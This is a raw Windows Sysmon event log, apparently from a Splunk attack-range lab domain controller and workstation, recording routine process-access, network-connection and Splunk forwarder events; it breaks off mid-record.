10:58:49.233{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000218095Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:50.614{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=325943AE7C6D50F65E66A2C86A348BFE,SHA256=7A0C91E416F85B7F75F9EA890653B1BBCF82007D33D664199756C475D4C66F8C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293550Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:50.989{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293549Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:50.989{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000293548Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:48.716{C8EA50B7-F11F-6215-0D00-000000003802}888C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local53812-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local135epmap 354300x8000000000000000293547Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:48.716{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local53812-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local135epmap 23542300x8000000000000000293546Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:50.388{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD63CB00A53F96645BBFF6FB63FAE317,SHA256=C63B948DFA80FC6E5E00D793F7E8F7F21C4336A7D25A6C97589CC33DC577C056,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218094Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:50.411{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=97BEE09C21E14E6188EBA328547F78B3,SHA256=6DB87700505EC3DC3B9FDE134C3B3F0720E192ADF0CA3820C37233CDA1F2BA96,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000218093Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:50.348{4F8D34B0-136A-6216-9604-000000003902}19282900C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218092Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:50.051{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-136A-6216-9604-000000003902}1928C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218091Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:50.051{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218090Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:50.051{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218089Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:50.051{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218088Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:50.051{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218087Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:50.051{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218086Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:50.051{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218085Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:50.051{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218084Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:50.051{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218083Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:50.051{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218082Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:50.051{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-136A-6216-9604-000000003902}1928C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000218081Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:50.051{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-136A-6216-9604-000000003902}1928C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000218080Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:50.052{4F8D34B0-136A-6216-9604-000000003902}1928C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000293545Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:50.156{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293544Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:50.156{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293543Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:50.156{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000218109Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:51.739{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E57DF1831FE2B2D2B3AE2538FA80A97,SHA256=9DC3DB0C423CDC6212BA73C181D94BFC9A2C4A4CD38F552DF3A46F17C47B9425,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000293556Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:49.623{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53813-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000293555Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:49.623{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53813-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000293554Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:51.406{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=926C9EC8390E2002C0A3AB298887577F,SHA256=DB0CA205B48E59404005A4DDA19B2431123B408DA4678942C1A6B29D36CDB50C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000218108Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:51.426{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-136B-6216-9704-000000003902}2792C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218107Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:51.426{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\S